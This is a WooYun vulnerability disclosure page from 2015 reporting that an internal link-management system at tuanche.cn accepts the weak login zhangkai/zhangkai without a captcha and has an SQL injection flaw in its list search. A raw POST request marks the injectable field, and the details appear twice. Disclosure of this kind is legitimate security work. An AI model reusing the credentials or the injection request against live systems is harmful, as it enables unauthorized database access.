当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139286

漏洞标题:团车网某系统存在弱口令+SQL注射漏洞

相关厂商:tuanche.cn

漏洞作者: 沦沦

提交时间:2015-09-06 15:12

修复时间:2015-10-21 16:18

公开时间:2015-10-21 16:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-06: 细节已通知厂商并且等待厂商处理中
2015-09-06: 厂商已经确认,细节仅向厂商公开
2015-09-16: 细节向核心白帽子及相关领域专家公开
2015-09-26: 细节向普通白帽子公开
2015-10-06: 细节向实习白帽子公开
2015-10-21: 细节向公众公开

简要描述:

RT

详细说明:

问题URL:http://friendlink.tuanche.cn/login
没加验证码可进行暴破
账号:zhangkai 密码:zhangkai

1.png


成功登入

1.1.png


查询的地方没进行过滤可注入

P_M3{%H~M_~GBSK]25SS_{B.png


POST /friendlink/list/ HTTP/1.1
Host: friendlink.tuanche.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://friendlink.tuanche.cn/friendlink/list/
Cookie: route=b5b5333556fa6659bfe91dcd849543f4; JSESSIONID=abcWdlcCCAVq15gZefH_u
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------317112827129879
Content-Length: 1980
-----------------------------317112827129879
Content-Disposition: form-data; name="flUrl"
-----------------------------317112827129879
Content-Disposition: form-data; name="flName"
1111*
-----------------------------317112827129879
Content-Disposition: form-data; name="flContacts"
-----------------------------317112827129879
Content-Disposition: form-data; name="url"
-----------------------------317112827129879
Content-Disposition: form-data; name="channel"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="cityId"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="brandId"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="styleId"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="carId"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="flType"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="startDate"
-----------------------------317112827129879
Content-Disposition: form-data; name="endDate"
-----------------------------317112827129879
Content-Disposition: form-data; name="userId"
0
-----------------------------317112827129879
Content-Disposition: form-data; name="status"
0
-----------------------------317112827129879
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
-----------------------------317112827129879
Content-Disposition: form-data; name="totalRows"
0
-----------------------------317112827129879
Content-Disposition: form-data; name="pageSize"
10
-----------------------------317112827129879
Content-Disposition: form-data; name="cpage"
0
-----------------------------317112827129879
Content-Disposition: form-data; name="selectpage"
10
-----------------------------317112827129879--


2.jpg


3.png


4.png

漏洞证明:

问题URL:http://friendlink.tuanche.cn/login
没加验证码可进行暴破
账号:zhangkai 密码:zhangkai

1.png


成功登入

1.1.png


查询的地方没进行过滤可注入

P_M3{%H~M_~GBSK]25SS_{B.png


POST /friendlink/list/ HTTP/1.1
Host: friendlink.tuanche.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://friendlink.tuanche.cn/friendlink/list/
Cookie: route=b5b5333556fa6659bfe91dcd849543f4; JSESSIONID=abcWdlcCCAVq15gZefH_u
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------317112827129879
Content-Length: 1980
-----------------------------317112827129879
Content-Disposition: form-data; name="flUrl"
-----------------------------317112827129879
Content-Disposition: form-data; name="flName"
1111*
-----------------------------317112827129879
Content-Disposition: form-data; name="flContacts"
-----------------------------317112827129879
Content-Disposition: form-data; name="url"
-----------------------------317112827129879
Content-Disposition: form-data; name="channel"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="cityId"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="brandId"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="styleId"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="carId"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="flType"
-1
-----------------------------317112827129879
Content-Disposition: form-data; name="startDate"
-----------------------------317112827129879
Content-Disposition: form-data; name="endDate"
-----------------------------317112827129879
Content-Disposition: form-data; name="userId"
0
-----------------------------317112827129879
Content-Disposition: form-data; name="status"
0
-----------------------------317112827129879
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
-----------------------------317112827129879
Content-Disposition: form-data; name="totalRows"
0
-----------------------------317112827129879
Content-Disposition: form-data; name="pageSize"
10
-----------------------------317112827129879
Content-Disposition: form-data; name="cpage"
0
-----------------------------317112827129879
Content-Disposition: form-data; name="selectpage"
10
-----------------------------317112827129879--


2.jpg


3.png


4.png

修复方案:

加验证码改密码过滤SQL注入

版权声明:转载请注明来源 沦沦@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-09-06 16:16

厂商回复:

谢谢你通知,内网系统忘记关闭外部访问权限了。

最新状态:

暂无